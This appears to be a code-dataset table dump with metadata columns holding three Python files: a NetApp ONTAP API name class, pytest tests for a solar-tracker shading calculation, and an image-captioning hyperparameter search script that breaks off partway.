hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
094e8d98bf97626f56dde5b13f1ebbff4895210d | 156 | py | Python | generated-libraries/python/netapp/cluster/license_code_v2.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | 2 | 2017-03-28T15:31:26.000Z | 2018-08-16T22:15:18.000Z | generated-libraries/python/netapp/cluster/license_code_v2.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | generated-libraries/python/netapp/cluster/license_code_v2.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | class LicenseCodeV2(basestring):
"""
License Code V2
"""
@staticmethod
def get_api_name():
return "license-code-v2"
| 15.6 | 34 | 0.557692 | 15 | 156 | 5.666667 | 0.8 | 0.258824 | 0.305882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028846 | 0.333333 | 156 | 9 | 35 | 17.333333 | 0.788462 | 0.096154 | 0 | 0 | 0 | 0 | 0.12 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
118ac1946b1587443b9255b15c3a963f9d3638f2 | 5,244 | py | Python | twoaxistracking/tests/test_shading.py | AdamRJensen/solartrackershading | 81955e9181c58b092c2f3a21041d884f49fef262 | [
"BSD-3-Clause"
] | 5 | 2022-02-23T20:18:44.000Z | 2022-03-09T20:26:09.000Z | twoaxistracking/tests/test_shading.py | pvlib/twoaxistracking | 81955e9181c58b092c2f3a21041d884f49fef262 | [
"BSD-3-Clause"
] | 11 | 2022-02-24T11:08:14.000Z | 2022-03-11T17:15:58.000Z | twoaxistracking/tests/test_shading.py | AdamRJensen/solartrackershading | 81955e9181c58b092c2f3a21041d884f49fef262 | [
"BSD-3-Clause"
] | 2 | 2022-02-23T20:14:44.000Z | 2022-02-23T20:18:54.000Z | from twoaxistracking import shading
import numpy as np
def test_shading(rectangular_geometry, active_geometry_split, square_field_layout):
# Test shading calculation
# Also plots the geometry (ensures no errors are raised)
collector_geometry, total_collector_area, min_tracker_spacing = rectangular_geometry
X, Y, Z, tracker_distance, relative_azimuth, relative_slope = \
square_field_layout
shaded_fraction = shading.shaded_fraction(
solar_elevation=3,
solar_azimuth=120,
total_collector_geometry=collector_geometry,
active_collector_geometry=active_geometry_split,
min_tracker_spacing=min_tracker_spacing,
tracker_distance=tracker_distance,
relative_azimuth=relative_azimuth,
relative_slope=relative_slope,
slope_azimuth=0,
slope_tilt=0,
plot=True)
np.testing.assert_allclose(shaded_fraction, 0.190320666774)
def test_shading_zero_solar_elevation(rectangular_geometry, square_field_layout):
# Test shading when geometries completely overlap
collector_geometry, total_collector_area, min_tracker_spacing = rectangular_geometry
X, Y, Z, tracker_distance, relative_azimuth, relative_slope = \
square_field_layout
shaded_fraction = shading.shaded_fraction(
solar_elevation=0,
solar_azimuth=180,
total_collector_geometry=collector_geometry,
active_collector_geometry=collector_geometry,
min_tracker_spacing=min_tracker_spacing,
tracker_distance=tracker_distance,
relative_azimuth=relative_azimuth,
relative_slope=relative_slope,
slope_azimuth=0,
slope_tilt=0,
plot=False)
assert shaded_fraction == 1
def test_no_shading(rectangular_geometry, square_field_layout):
# Test shading calculation when there is no shading (high solar elevation)
collector_geometry, total_collector_area, min_tracker_spacing = rectangular_geometry
X, Y, Z, tracker_distance, relative_azimuth, relative_slope = \
square_field_layout
shaded_fraction = shading.shaded_fraction(
solar_elevation=45,
solar_azimuth=180,
total_collector_geometry=collector_geometry,
active_collector_geometry=collector_geometry,
min_tracker_spacing=min_tracker_spacing,
tracker_distance=tracker_distance,
relative_azimuth=relative_azimuth,
relative_slope=relative_slope,
slope_azimuth=0,
slope_tilt=0,
plot=False)
assert shaded_fraction == 0
def test_shading_below_horizon(rectangular_geometry, square_field_layout):
# Test shading calculation when sun is below the horizon (elevation<0)
collector_geometry, total_collector_area, min_tracker_spacing = rectangular_geometry
X, Y, Z, tracker_distance, relative_azimuth, relative_slope = \
square_field_layout
shaded_fraction = shading.shaded_fraction(
solar_elevation=-5.1,
solar_azimuth=180,
total_collector_geometry=collector_geometry,
active_collector_geometry=collector_geometry,
min_tracker_spacing=min_tracker_spacing,
tracker_distance=tracker_distance,
relative_azimuth=relative_azimuth,
relative_slope=relative_slope,
slope_azimuth=0,
slope_tilt=0,
plot=False)
assert np.isnan(shaded_fraction)
def test_shading_below_hill_horizon(rectangular_geometry, square_field_layout):
# Test shading when sun is below horizon line caused by sloped surface
collector_geometry, total_collector_area, min_tracker_spacing = rectangular_geometry
X, Y, Z, tracker_distance, relative_azimuth, relative_slope = \
square_field_layout
shaded_fraction = shading.shaded_fraction(
solar_elevation=9,
solar_azimuth=180,
total_collector_geometry=collector_geometry,
active_collector_geometry=collector_geometry,
min_tracker_spacing=min_tracker_spacing,
tracker_distance=tracker_distance,
relative_azimuth=relative_azimuth,
relative_slope=relative_slope,
slope_azimuth=0,
slope_tilt=10,
plot=False)
assert shaded_fraction == 1
def test_shading_max_shading_elevation(rectangular_geometry, square_field_layout):
# Test that shaded_fraction is set to one when the solar elevation angle
# is greater than the max_shading_elevation (even though shading may occur)
collector_geometry, total_collector_area, min_tracker_spacing = rectangular_geometry
X, Y, Z, tracker_distance, relative_azimuth, relative_slope = \
square_field_layout
shaded_fraction = shading.shaded_fraction(
solar_elevation=3, # low solar elevation angle with guaranteed shading
solar_azimuth=180,
total_collector_geometry=collector_geometry,
active_collector_geometry=collector_geometry,
min_tracker_spacing=min_tracker_spacing,
tracker_distance=tracker_distance,
relative_azimuth=relative_azimuth,
relative_slope=relative_slope,
slope_azimuth=0,
slope_tilt=10,
max_shading_elevation=2, # lower than true max angle for testing purposes
plot=False)
assert shaded_fraction == 0
| 41.619048 | 88 | 0.749237 | 612 | 5,244 | 6.013072 | 0.156863 | 0.133967 | 0.083152 | 0.097826 | 0.810326 | 0.810326 | 0.791304 | 0.775543 | 0.714946 | 0.68125 | 0 | 0.014034 | 0.198322 | 5,244 | 125 | 89 | 41.952 | 0.861323 | 0.110603 | 0 | 0.828571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057143 | 1 | 0.057143 | false | 0 | 0.019048 | 0 | 0.07619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
11abe604f0160b86b71880ab20db1655dac6ef87 | 32,900 | py | Python | experiments/thesis/langmodtrans_hyperpar.py | mtanti/mtanti-phd | d915b6f96f1bae1a7f517eb1dbd9d4a88ca56576 | [
"MIT"
] | 6 | 2019-05-20T06:48:37.000Z | 2021-01-03T05:43:47.000Z | experiments/thesis/langmodtrans_hyperpar.py | mtanti/mtanti-phd | d915b6f96f1bae1a7f517eb1dbd9d4a88ca56576 | [
"MIT"
] | 1 | 2019-01-17T03:17:10.000Z | 2019-02-23T17:31:41.000Z | experiments/thesis/langmodtrans_hyperpar.py | mtanti/mtanti-phd | d915b6f96f1bae1a7f517eb1dbd9d4a88ca56576 | [
"MIT"
] | null | null | null | import skopt
import os
import numpy as np
import shutil
import sys
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
from framework import lib
from framework import model_neural_trad
from framework import evaluation
from framework import data
from framework import config
########################################################################################
class InfinitePerplexityError(ArithmeticError):
def __init__(self):
super(InfinitePerplexityError, self).__init__()
########################################################################################
def standardize_hyperpar(hp):
new_hp = [
(
round(x.tolist(), 20) if type(x) is np.float64 else
x.tolist() if type(x) is np.int64 else
x
) for x in hp
]
return new_hp
########################################################################################
def prepare_hyperpar_for_tell(hp):
return hp
########################################################################################
if len(sys.argv) == 1:
corpora = 'lm1b,mscoco,flickr8k'.split(',')
else:
corpora = sys.argv[1].split(',')
datasources = data.load_datasources(config.langmodtrans_capgen_dataset)
capgen_size = datasources['train'].size
capgen_test = data.load_datasources('mscoco')['test'].shuffle(0).take(datasources['test'].num_groups, whole_groups=True) #MSCOCO test is never used in langmodtrans experiments so we can validate on it
del datasources
lib.create_dir(config.hyperpar_dir+'/langmodtrans')
for corpus in corpora:
lib.create_dir(config.hyperpar_dir+'/langmodtrans/'+corpus)
print('='*100)
print(lib.formatted_clock())
print(corpus, '1 (language model)')
print()
if lib.file_exists(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_best.txt'):
print('Found ready')
print()
continue
print(
'#',
'init_method',
'max_init_weight',
'embed_size',
'rnn_size',
'post_image_size',
'pre_output_size',
'post_image_activation',
'rnn_type',
'optimizer',
'learning_rate',
'normalize_image',
'weights_reg_weight',
'image_dropout_prob',
'post_image_dropout_prob',
'embedding_dropout_prob',
'rnn_dropout_prob',
'max_gradient_norm',
'minibatch_size',
'beam_width',
'geomeanpplx',
'duration',
sep='\t'
)
datasources = data.load_datasources(corpus)
datasources['train'] = datasources['train'].shuffle(0).take(capgen_size)
vocab = datasources['train'].tokenize_sents().text_sents.get_vocab(config.min_token_freq)
dataset = data.Dataset(
vocab = vocab,
train_datasource = datasources['train'],
val_datasource = datasources['val'],
test_datasource = capgen_test,
)
dataset.compile_sents()
test_index_sents = dataset.test.index_sents
if not lib.file_exists(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search.txt'):
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search.txt', 'w', encoding='utf-8') as f:
print(
'#',
'init_method',
'max_init_weight',
'embed_size',
'rnn_size',
'post_image_size',
'pre_output_size',
'post_image_activation',
'rnn_type',
'optimizer',
'learning_rate',
'normalize_image',
'weights_reg_weight',
'image_dropout_prob',
'post_image_dropout_prob',
'embedding_dropout_prob',
'rnn_dropout_prob',
'max_gradient_norm',
'minibatch_size',
'beam_width',
'geomeanpplx',
'duration',
sep='\t', file=f
)
if not lib.file_exists(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search_errors.txt'):
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search_errors.txt', 'w', encoding='utf-8') as f:
print(
'#',
'init_method',
'max_init_weight',
'embed_size',
'rnn_size',
'post_image_size',
'pre_output_size',
'post_image_activation',
'rnn_type',
'optimizer',
'learning_rate',
'normalize_image',
'weights_reg_weight',
'image_dropout_prob',
'post_image_dropout_prob',
'embedding_dropout_prob',
'rnn_dropout_prob',
'max_gradient_norm',
'minibatch_size',
'beam_width',
'error',
'duration',
sep='\t', file=f
)
def objective(hyperpar):
[
init_method,
max_init_weight,
embed_size,
rnn_size,
post_image_size,
pre_output_size,
post_image_activation,
rnn_type,
optimizer,
learning_rate,
normalize_image,
weights_reg_weight,
image_dropout_prob,
post_image_dropout_prob,
embedding_dropout_prob,
rnn_dropout_prob,
max_gradient_norm,
minibatch_size,
beam_width,
] = hyperpar
with model_neural_trad.TradNeuralModel(
vocab_size = vocab.size,
init_method = init_method,
max_init_weight = max_init_weight,
embed_size = embed_size,
rnn_size = rnn_size,
post_image_size = post_image_size,
pre_output_size = pre_output_size,
post_image_activation = post_image_activation,
rnn_type = rnn_type,
architecture = 'langmod',
optimizer = optimizer,
learning_rate = learning_rate,
normalize_image = normalize_image,
weights_reg_weight = weights_reg_weight,
image_dropout_prob = image_dropout_prob,
post_image_dropout_prob = post_image_dropout_prob,
embedding_dropout_prob = embedding_dropout_prob,
rnn_dropout_prob = rnn_dropout_prob,
max_gradient_norm = max_gradient_norm,
freeze_prefix_params = False,
) as model:
model.compile_model()
result = list()
for _ in range(config.hyperpar_num_runs):
model.init_params()
model.fit(dataset, config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_model.hdf5', max_batch_size=config.val_batch_size, minibatch_size=minibatch_size, max_epochs=config.hyperpar_max_epochs, early_stop_patience=config.early_stop_patience)
(logpplx, num_inf_pplx) = evaluation.get_loggeomean_perplexity(model.get_sents_logprobs(max_batch_size=config.val_batch_size, index_sents=test_index_sents)[0], test_index_sents.lens)
if num_inf_pplx > 0:
raise InfinitePerplexityError()
result.append(logpplx)
return np.mean(result)
opt = skopt.Optimizer(
[
skopt.space.Categorical(config.hyperpar_space['init_method'], name='init_method'),
skopt.space.Real(*config.hyperpar_space['max_init_weight'], 'log-uniform', name='max_init_weight'),
skopt.space.Integer(*config.hyperpar_space['embed_size'], name='embed_size'),
skopt.space.Integer(*config.hyperpar_space['rnn_size'], name='rnn_size'),
skopt.space.Categorical([None], name='post_image_size'),
skopt.space.Categorical([None], name='pre_output_size'),
skopt.space.Categorical(['none'], name='post_image_activation'),
skopt.space.Categorical(config.hyperpar_space['rnn_type'], name='rnn_type'),
skopt.space.Categorical(config.hyperpar_space['optimizer'], name='optimizer'),
skopt.space.Real(*config.hyperpar_space['learning_rate'], 'log-uniform', name='learning_rate'),
skopt.space.Categorical([False], name='normalize_image'),
skopt.space.Real(*config.hyperpar_space['weights_reg_weight'], 'log-uniform', name='weights_reg_weight'),
skopt.space.Categorical([0.0], name='image_dropout_prob'),
skopt.space.Categorical([0.0], name='post_image_dropout_prob'),
skopt.space.Real(*config.hyperpar_space['embedding_dropout_prob'], 'uniform', name='embedding_dropout_prob'),
skopt.space.Real(*config.hyperpar_space['rnn_dropout_prob'], 'uniform', name='rnn_dropout_prob'),
skopt.space.Real(*config.hyperpar_space['max_gradient_norm'], 'log-uniform', name='max_gradient_norm'),
skopt.space.Integer(*config.hyperpar_space['minibatch_size'], name='minibatch_size'),
skopt.space.Categorical([1], name='beam_width'),
],
n_initial_points=config.hyperpar_num_random_evals,
base_estimator='RF',
acq_func='EI',
acq_optimizer='auto',
random_state=0,
)
i = 0
already_seen = set()
best_hyperpar = None
best_cost = None
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search.txt', 'r', encoding='utf-8') as f:
for line in f.read().strip().split('\n')[1:]:
i += 1
[
entry_num,
init_method,
max_init_weight,
embed_size,
rnn_size,
post_image_size,
pre_output_size,
post_image_activation,
rnn_type,
optimizer,
learning_rate,
normalize_image,
weights_reg_weight,
image_dropout_prob,
post_image_dropout_prob,
embedding_dropout_prob,
rnn_dropout_prob,
max_gradient_norm,
minibatch_size,
beam_width,
cost,
duration,
] = line.split('\t')
next_hyperpar = [
init_method,
float(max_init_weight),
int(embed_size),
int(rnn_size),
int(post_image_size) if post_image_size != 'None' else None,
int(pre_output_size) if pre_output_size != 'None' else None,
post_image_activation,
rnn_type,
optimizer,
float(learning_rate),
normalize_image == 'True',
float(weights_reg_weight),
float(image_dropout_prob),
float(post_image_dropout_prob),
float(embedding_dropout_prob),
float(rnn_dropout_prob),
float(max_gradient_norm),
int(minibatch_size),
int(beam_width),
]
cost = float(cost)
duration = int(duration)
if i < config.hyperpar_num_random_evals + config.hyperpar_num_evals:
num_hyperpars = 1
while standardize_hyperpar(opt.ask(num_hyperpars)[-1]) != next_hyperpar:
print(i, '<<FOUND HYPERPARAMS THAT RESULTED IN ERRORS LAST TIME>>')
num_hyperpars += 1
opt.tell(prepare_hyperpar_for_tell(next_hyperpar), cost)
if best_cost is None or cost < best_cost:
best_hyperpar = next_hyperpar
best_cost = cost
already_seen.add(tuple(next_hyperpar))
print(i, *next_hyperpar, cost, lib.format_duration(duration), '******' if cost == best_cost else '', sep='\t')
for _ in range(i, config.hyperpar_num_random_evals + config.hyperpar_num_evals):
i += 1
num_hyperpars = 1
while True:
t = lib.Timer()
next_hyperpar = standardize_hyperpar(opt.ask(num_hyperpars)[-1]) #This allows us to get different hyperparameters every time the previous hyperparameters resulted in <<SEEN>>, <<NAN>>, or <<EMPTY>>
num_hyperpars += 1
print(i, *next_hyperpar, sep='\t', end='\t')
if tuple(next_hyperpar) in already_seen:
duration = t.get_duration()
print('<<SEEN>>', lib.format_duration(duration), sep='\t')
continue
try:
cost = objective(next_hyperpar)
except model_neural_trad.NotANumberError:
duration = t.get_duration()
print('<<NAN>>', lib.format_duration(duration), sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search_errors.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, 'nan', duration, sep='\t', file=f)
continue
except model_neural_trad.EmptyBeamError:
duration = t.get_duration()
print('<<EMPTY>>', lib.format_duration(duration), sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search_errors.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, 'empty', duration, sep='\t', file=f)
continue
except InfinitePerplexityError:
duration = t.get_duration()
print('<<INFPPLX>>', lib.format_duration(duration), sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search_errors.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, 'infpplx', duration, sep='\t', file=f)
continue
break
duration = t.get_duration()
opt.tell(prepare_hyperpar_for_tell(next_hyperpar), cost)
if best_cost is None or cost < best_cost:
best_hyperpar = next_hyperpar
best_cost = cost
shutil.copyfile(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_model.hdf5', config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_model_best.hdf5')
already_seen.add(tuple(next_hyperpar))
print(cost, lib.format_duration(duration), '******' if cost == best_cost else '', sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, cost, duration, sep='\t', file=f)
print('-'*100)
print(lib.formatted_clock())
print('best found:')
print('', *best_hyperpar, best_cost, sep='\t')
print()
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_best.txt', 'w', encoding='utf-8') as f:
print('loggeomeanpplx', best_cost, sep='\t', file=f)
print('init_method', best_hyperpar[0], sep='\t', file=f)
print('max_init_weight', best_hyperpar[1], sep='\t', file=f)
print('embed_size', best_hyperpar[2], sep='\t', file=f)
print('rnn_size', best_hyperpar[3], sep='\t', file=f)
print('post_image_size', best_hyperpar[4], sep='\t', file=f)
print('pre_output_size', best_hyperpar[5], sep='\t', file=f)
print('post_image_activation', best_hyperpar[6], sep='\t', file=f)
print('rnn_type', best_hyperpar[7], sep='\t', file=f)
print('optimizer', best_hyperpar[8], sep='\t', file=f)
print('learning_rate', best_hyperpar[9], sep='\t', file=f)
print('normalize_image', best_hyperpar[10], sep='\t', file=f)
print('weights_reg_weight', best_hyperpar[11], sep='\t', file=f)
print('image_dropout_prob', best_hyperpar[12], sep='\t', file=f)
print('post_image_dropout_prob', best_hyperpar[13], sep='\t', file=f)
print('embedding_dropout_prob', best_hyperpar[14], sep='\t', file=f)
print('rnn_dropout_prob', best_hyperpar[15], sep='\t', file=f)
print('max_gradient_norm', best_hyperpar[16], sep='\t', file=f)
print('minibatch_size', best_hyperpar[17], sep='\t', file=f)
print('beam_width', best_hyperpar[18], sep='\t', file=f)
best_prefix_params = model_neural_trad.TradNeuralModel.get_saved_prefix_params(vocab, config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_model_best.hdf5')
langmod_embed_size = best_hyperpar[2]
langmod_rnn_size = best_hyperpar[3]
langmod_rnn_type = best_hyperpar[7]
langmod_embedding_dropout_prob = best_hyperpar[14]
########################################################################################
print('-'*100)
print(lib.formatted_clock())
print(corpus, '2 (caption generator)')
print()
print(
'#',
'init_method',
'max_init_weight',
'embed_size',
'rnn_size',
'post_image_size',
'pre_output_size',
'rnn_type',
'post_image_activation',
'optimizer',
'learning_rate',
'normalize_image',
'weights_reg_weight',
'image_dropout_prob',
'post_image_dropout_prob',
'embedding_dropout_prob',
'rnn_dropout_prob',
'max_gradient_norm',
'minibatch_size',
'beam_width',
'WMD',
'duration',
sep='\t'
)
datasources = data.load_datasources(config.langmodtrans_capgen_dataset)
vocab = datasources['train'].tokenize_sents().text_sents.get_vocab(config.min_token_freq).intersection(best_prefix_params.vocab)
dataset = data.Dataset(
vocab = vocab,
train_datasource = datasources['train'],
val_datasource = datasources['val'],
test_datasource = data.load_datasources('mscoco')['val'].shuffle(0).take(datasources['test'].num_groups, whole_groups=True),
)
dataset.compile_sents()
test_images = dataset.test.get_images()
test_sents = dataset.test.get_text_sent_groups()
best_prefix_params = best_prefix_params.convert_to_new_vocabulary(vocab)
if not lib.file_exists(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search.txt'):
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search.txt', 'w', encoding='utf-8') as f:
print(
'#',
'init_method',
'max_init_weight',
'embed_size',
'rnn_size',
'post_image_size',
'pre_output_size',
'post_image_activation',
'rnn_type',
'optimizer',
'learning_rate',
'normalize_image',
'weights_reg_weight',
'image_dropout_prob',
'post_image_dropout_prob',
'embedding_dropout_prob',
'rnn_dropout_prob',
'max_gradient_norm',
'minibatch_size',
'beam_width',
'WMD',
'duration',
sep='\t', file=f
)
if not lib.file_exists(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search_errors.txt'):
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search_errors.txt', 'w', encoding='utf-8') as f:
print(
'#',
'init_method',
'max_init_weight',
'embed_size',
'rnn_size',
'post_image_size',
'pre_output_size',
'post_image_activation',
'rnn_type',
'optimizer',
'learning_rate',
'normalize_image',
'weights_reg_weight',
'image_dropout_prob',
'post_image_dropout_prob',
'embedding_dropout_prob',
'rnn_dropout_prob',
'max_gradient_norm',
'minibatch_size',
'beam_width',
'error',
'duration',
sep='\t', file=f
)
def objective(hyperpar):
[
init_method,
max_init_weight,
embed_size,
rnn_size,
post_image_size,
pre_output_size,
post_image_activation,
rnn_type,
optimizer,
learning_rate,
normalize_image,
weights_reg_weight,
image_dropout_prob,
post_image_dropout_prob,
embedding_dropout_prob,
rnn_dropout_prob,
max_gradient_norm,
minibatch_size,
beam_width,
] = hyperpar
with model_neural_trad.TradNeuralModel(
vocab_size = vocab.size,
init_method = init_method,
max_init_weight = max_init_weight,
embed_size = embed_size,
rnn_size = rnn_size,
post_image_size = post_image_size,
pre_output_size = pre_output_size,
post_image_activation = post_image_activation,
rnn_type = rnn_type,
architecture = 'merge',
optimizer = optimizer,
learning_rate = learning_rate,
normalize_image = normalize_image,
weights_reg_weight = weights_reg_weight,
image_dropout_prob = image_dropout_prob,
post_image_dropout_prob = post_image_dropout_prob,
embedding_dropout_prob = embedding_dropout_prob,
rnn_dropout_prob = rnn_dropout_prob,
max_gradient_norm = max_gradient_norm,
freeze_prefix_params = True,
) as model:
model.compile_model()
result = list()
for _ in range(config.hyperpar_num_runs):
model.init_params()
model.set_prefix_params(best_prefix_params)
model.fit(dataset, config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_model.hdf5', max_batch_size=config.val_batch_size, minibatch_size=minibatch_size, max_epochs=config.hyperpar_max_epochs, early_stop_patience=config.early_stop_patience)
(index_sents, logprobs) = model.generate_sents_beamsearch(max_batch_size=config.val_batch_size, images=test_images, beam_width=beam_width, lower_bound_len=config.lower_bound_len, upper_bound_len=config.upper_bound_len, temperature=config.temperature)
text_sents = index_sents.decompile_sents(vocab).sents
wmd = evaluation.get_wmd_score(test_sents, text_sents)[0]
result.append(wmd)
return -np.mean(result)
opt = skopt.Optimizer(
[
skopt.space.Categorical(config.hyperpar_space['init_method'], name='init_method'),
skopt.space.Real(*config.hyperpar_space['max_init_weight'], 'log-uniform', name='max_init_weight'),
skopt.space.Categorical([langmod_embed_size], name='embed_size'),
skopt.space.Categorical([langmod_rnn_size], name='rnn_size'),
skopt.space.Integer(*config.hyperpar_space['post_image_size'], name='post_image_size'),
skopt.space.Categorical([None], name='pre_output_size'),
skopt.space.Categorical(config.hyperpar_space['post_image_activation'], name='post_image_activation'),
skopt.space.Categorical([langmod_rnn_type], name='rnn_type'),
skopt.space.Categorical(config.hyperpar_space['optimizer'], name='optimizer'),
skopt.space.Real(*config.hyperpar_space['learning_rate'], 'log-uniform', name='learning_rate'),
skopt.space.Categorical(config.hyperpar_space['normalize_image'], name='normalize_image'),
skopt.space.Real(*config.hyperpar_space['weights_reg_weight'], 'log-uniform', name='weights_reg_weight'),
skopt.space.Real(*config.hyperpar_space['image_dropout_prob'], 'uniform', name='image_dropout_prob'),
skopt.space.Real(*config.hyperpar_space['post_image_dropout_prob'], 'uniform', name='post_image_dropout_prob'),
skopt.space.Categorical([langmod_embedding_dropout_prob], name='embedding_dropout_prob'),
skopt.space.Real(*config.hyperpar_space['rnn_dropout_prob'], 'uniform', name='rnn_dropout_prob'),
skopt.space.Real(*config.hyperpar_space['max_gradient_norm'], 'log-uniform', name='max_gradient_norm'),
